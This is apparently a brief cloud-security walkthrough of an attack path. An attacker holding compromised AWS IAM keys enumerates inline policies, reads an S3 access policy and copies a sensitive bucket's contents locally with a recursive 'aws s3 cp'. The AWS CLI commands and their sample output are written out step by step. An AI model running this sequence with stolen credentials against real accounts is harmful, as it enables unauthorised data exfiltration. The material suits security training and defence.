Compromised IAM Access Keys Leading to S3 Data Breach
-
Start with Compromised IAM Access Keys
- An attacker gains access to IAM access keys.
-
Enumerate Inline Policies
- Use the following command to list inline policies associated with the compromised user:
aws iam list-user-policies --user-name [userName] - Output: Custom inline policy is identified:
{
"PolicyNames": ["S3_Access"]
}
- Use the following command to list inline policies associated with the compromised user:
-
Retrieve Details of the Inline Policy
- Use this command to get the details of the inline policy:
aws iam get-user-policy --user-name [userName] --policy-name S3_Access - Output: The policy grants access to an S3 bucket:
{
"PolicyDocument": {
"Statement": [
{
"Effect": "Allow",
"Action": "s3:*",
"Resource": "arn:aws:s3:::sensitive-data-bucket/*"
}
]
}
}
- Use this command to get the details of the inline policy:
-
Dump the Contents of the S3 Bucket
- Use the following command to enumerate and download the bucket's contents:
aws s3 cp s3://sensitive-data-bucket ./local-directory --recursive - Result: The attacker successfully exfiltrates sensitive data from the S3 bucket.
- Use the following command to enumerate and download the bucket's contents: